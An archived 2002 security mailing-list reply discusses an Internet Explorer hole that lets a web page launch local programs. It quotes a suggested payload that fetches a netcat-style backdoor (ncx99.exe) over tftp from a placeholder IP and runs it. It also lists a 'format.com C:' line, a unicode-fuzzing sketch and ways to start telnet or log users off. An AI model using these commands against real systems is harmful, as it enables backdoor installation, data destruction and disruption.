('binary' encoding is not supported, stored as-is) In-Reply-To: <20020313125115.A14918at_private> >I havent tried, since i don't run MS, how about ? >var programName=new Array( >'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe', >'c:/winnt/system32/ncx99.exe'); I tried you idea nocon...it seems that the codebase will not let you pass any parameters... so 'C:/WINDOWS/system32/calc.exe' will work but 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe' will not because of the parameters I've researched getting this to work by using unicode chars to see if there was something that you could put in to bypass this...but alas it wont work…note that spaces are allowed in the directory path, but not after the program name. so this would work: 'C:/Program Files/intern~1/IEXPLORER.exe' but these wont: 'C:/Program Files/intern~1/IEXPLORER.exe -k' 'C:/WINDOWS/system32/format.com C:' //pseudo code...showing the concept of how I tried every Unicode char for(i=0;i<65535;i++) $= unicodeCharAt(i) 'C:/Program Files/intern~/IEXPLORER.exe$-k' The only possible attack vector I can see from this is if you had prior knowledge to the path of a program on a system that you wanted to execute. This is slightly dangerous if you are running as admin because the telnet server could be started by launching %SYSTEMROOT%\system32\tlntsess.exe But you would still need a valid user/pass to gain access.(and you should be slapped if you are web browsing as admin) I'm glad this hole turned out to be relatively benign... this would have turned into a really dangerous hole and not just an annoying one if parameters could be passed. But don't forget that script kiddies could "boot" you by executing logoff.exe/tsshutdn.exe/tsdiscon.exe/ if anybody else finds a way of getting the parameters to work....please post to the list. lata, -Slow2Show- University of Florida p.s. see ya @ SANS2002...party Florida style!!
This archive was generated by hypermail 2b30 : Thu Mar 14 2002 - 08:54:29 PST